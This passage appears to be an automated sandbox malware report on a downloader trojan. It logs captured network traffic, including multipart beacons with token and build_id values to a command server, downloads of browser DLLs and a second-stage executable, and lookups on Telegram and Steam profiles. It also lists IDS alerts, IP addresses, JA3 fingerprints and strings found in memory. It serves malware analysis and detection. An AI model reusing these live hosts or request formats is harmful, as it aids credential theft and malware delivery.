20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 63 63 39 63 37 65 61 65 62 66 64 66 32 61 38 63 63 30 35 38 36 64 37 34 31 39 64 36 65 61 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 46 43 47 44 47 48 44 48 49 45 43 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 46 43 47 44 47 48 44 48 49 45 43 47 43 42 4b 2d 2d 0d 0a Data Ascii: ------GIJJKFCGDGHDHIECGCBKContent-Disposition: form-data; name="token"95787170bd8bd7ecb7c5c39b1938e9cc------GIJJKFCGDGHDHIECGCBKContent-Disposition: form-data; name="build_id"8ecc9c7eaebfdf2a8cc0586d7419d6ea------GIJJKFCGDGHDHIECGCBKContent-Disposition: form-data; name="mode"5------GIJJKFCGDGHDHIECGCBK--
Source: global traffic	HTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1Host: nsdm.cumpar-auto-orice-tip.roCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGCFHIDAKECFHIEBFCGHost: kasm.zubairgul.comContent-Length: 499Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 37 38 37 31 37 30 62 64 38 62 64 37 65 63 62 37 63 35 63 33 39 62 31 39 33 38 65 39 63 63 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 63 63 39 63 37 65 61 65 62 66 64 66 32 61 38 63 63 30 35 38 36 64 37 34 31 39 64 36 65 61 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 31 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 61 73 6b 5f 69 64 22 0d 0a 0d 0a 31 32 38 38 30 30 38 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 74 61 74 75 73 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 2d 2d 0d 0a Data Ascii: ------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="token"95787170bd8bd7ecb7c5c39b1938e9cc------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="build_id"8ecc9c7eaebfdf2a8cc0586d7419d6ea------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="mode"51------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="task_id"1288008------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="status"1------HDGCFHIDAKECFHIEBFCG--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDBKKJKJEBFBGCBAAFIHost: kasm.zubairgul.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 42 4b 4b 4a 4b 4a 45 42 46 42 47 43 42 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 37 38 37 31 37 30 62 64 38 62 64 37 65 63 62 37 63 35 63 33 39 62 31 39 33 38 65 39 63 63 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 42 4b 4b 4a 4b 4a 45 42 46 42 47 43 42 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 63 63 39 63 37 65 61 65 62 66 64 66 32 61 38 63 63 30 35 38 36 64 37 34 31 39 64 36 65 61 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 42 4b 4b 4a 4b 4a 45 42 46 42 47 43 42 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 42 4b 4b 4a 4b 4a 45 42 46 42 47 43 42 41 41 46 49 2d 2d 0d 0a Data Ascii: ------IJDBKKJKJEBFBGCBAAFIContent-Disposition: form-data; name="token"95787170bd8bd7ecb7c5c39b1938e9cc------IJDBKKJKJEBFBGCBAAFIContent-Disposition: form-data; name="build_id"8ecc9c7eaebfdf2a8cc0586d7419d6ea------IJDBKKJKJEBFBGCBAAFIContent-Disposition: form-data; name="mode"6------IJDBKKJKJEBFBGCBAAFI--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDBKKJKJEBFBGCBAAFIHost: kasm.zubairgul.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 42 4b 4b 4a 4b 4a 45 42 46 42 47 43 42 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 37 38 37 31 37 30 62 64 38 62 64 37 65 63 62 37 63 35 63 33 39 62 31 39 33 38 65 39 63 63 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 42 4b 4b 4a 4b 4a 45 42 46 42 47 43 42 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 63 63 39 63 37 65 61 65 62 66 64 66 32 61 38 63 63 30 35 38 36 64 37 34 31 39 64 36 65 61 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 42 4b 4b 4a 4b 4a 45 42 46 42 47 43 42 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 42 4b 4b 4a 4b 4a 45 42 46 42 47 43 42 41 41 46 49 2d 2d 0d 0a Data Ascii: ------IJDBKKJKJEBFBGCBAAFIContent-Disposition: form-data; name="token"95787170bd8bd7ecb7c5c39b1938e9cc------IJDBKKJKJEBFBGCBAAFIContent-Disposition: form-data; name="build_id"8ecc9c7eaebfdf2a8cc0586d7419d6ea------IJDBKKJKJEBFBGCBAAFIContent-Disposition: form-data; name="mode"6------IJDBKKJKJEBFBGCBAAFI--

Source: Joe Sandbox View	IP Address: 95.164.90.97 95.164.90.97
Source: Joe Sandbox View	IP Address: 147.45.44.104 147.45.44.104

Source: Joe Sandbox View	ASN Name: VAKPoltavaUkraineUA VAKPoltavaUkraineUA
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic

Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49875 -> 147.45.44.104:80

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drawwyobstacw.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mathcucom.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: allocatinow.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: enlargkiw.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: resinedyw.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: vennurviot.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: condifendteu.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drawwyobstacw.sbs
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49723 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.198.32
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.198.32
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 2_2_00406963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

2_2_00406963

Source: global traffic	HTTP traffic detected: GET /maslengdsa HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sql.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1Host: nsdm.cumpar-auto-orice-tip.roCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: kasm.zubairgul.com
Source: global traffic	DNS traffic detected: DNS query: nsdm.cumpar-auto-orice-tip.ro
Source: global traffic	DNS traffic detected: DNS query: drawwyobstacw.sbs
Source: global traffic	DNS traffic detected: DNS query: mathcucom.sbs
Source: global traffic	DNS traffic detected: DNS query: cowod.hopto.org
Source: global traffic	DNS traffic detected: DNS query: allocatinow.sbs
Source: global traffic	DNS traffic detected: DNS query: enlargkiw.sbs
Source: global traffic	DNS traffic detected: DNS query: resinedyw.sbs
Source: global traffic	DNS traffic detected: DNS query: vennurviot.sbs
Source: global traffic	DNS traffic detected: DNS query: ehticsprocw.sbs
Source: global traffic	DNS traffic detected: DNS query: condifendteu.sbs
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: sergei-esenin.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drawwyobstacw.sbs

Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe, a43486128347[1].exe.2.dr, AKEGIIJDGH.exe.2.dr	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: MSBuild.exe, 00000002.00000002.2537914757.0000000020A2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2541104928.0000000026993000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2546767035.000000003287B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2552365776.000000003E75F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: MSBuild.exe, 00000002.00000002.2537914757.0000000020A2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2541104928.0000000026993000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2546767035.000000003287B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2552365776.000000003E75F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: MSBuild.exe, 00000002.00000002.2537914757.0000000020A2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2541104928.0000000026993000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2546767035.000000003287B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2552365776.000000003E75F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe, a43486128347[1].exe.2.dr, AKEGIIJDGH.exe.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: MSBuild.exe, 00000002.00000002.2537914757.0000000020A2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2541104928.0000000026993000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2546767035.000000003287B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2552365776.000000003E75F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: MSBuild.exe, 00000002.00000002.2537914757.0000000020A2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2541104928.0000000026993000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2546767035.000000003287B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2552365776.000000003E75F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, a43486128347[1].exe.2.dr, nss3.dll.2.dr, AKEGIIJDGH.exe.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: MSBuild.exe, 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto
Source: MSBuild.exe, 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.
Source: MSBuild.exe, 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.IEBFCG
Source: MSBuild.exe, 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org
Source: MSBuild.exe, 00000002.00000002.2517585992.00000000015BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org/
Source: MSBuild.exe, 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.orgFCG
Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe, 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
Source: MSBuild.exe, 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hoptoIECFBFI
Source: MSBuild.exe, 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.multipart/form-data;
Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe, a43486128347[1].exe.2.dr, AKEGIIJDGH.exe.2.dr	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe, a43486128347[1].exe.2.dr, AKEGIIJDGH.exe.2.dr	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: MSBuild.exe, 00000002.00000002.2537914757.0000000020A2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2541104928.0000000026993000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2546767035.000000003287B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2552365776.000000003E75F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: MSBuild.exe, 00000002.00000002.2537914757.0000000020A2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2541104928.0000000026993000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2546767035.000000003287B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2552365776.000000003E75F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: MSBuild.exe, 00000002.00000002.2537914757.0000000020A2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2541104928.0000000026993000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2546767035.000000003287B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2552365776.000000003E75F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe, a43486128347[1].exe.2.dr, AKEGIIJDGH.exe.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: MSBuild.exe, 00000002.00000002.2537914757.0000000020A2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2541104928.0000000026993000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2546767035.000000003287B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2552365776.000000003E75F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: MSBuild.exe, 00000002.00000002.2537914757.0000000020A2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2541104928.0000000026993000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2546767035.000000003287B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2552365776.000000003E75F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, a43486128347[1].exe.2.dr, nss3.dll.2.dr, AKEGIIJDGH.exe.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: MSBuild.exe, 00000002.00000002.2537914757.0000000020A2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2541104928.0000000026993000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2546767035.000000003287B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2552365776.000000003E75F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
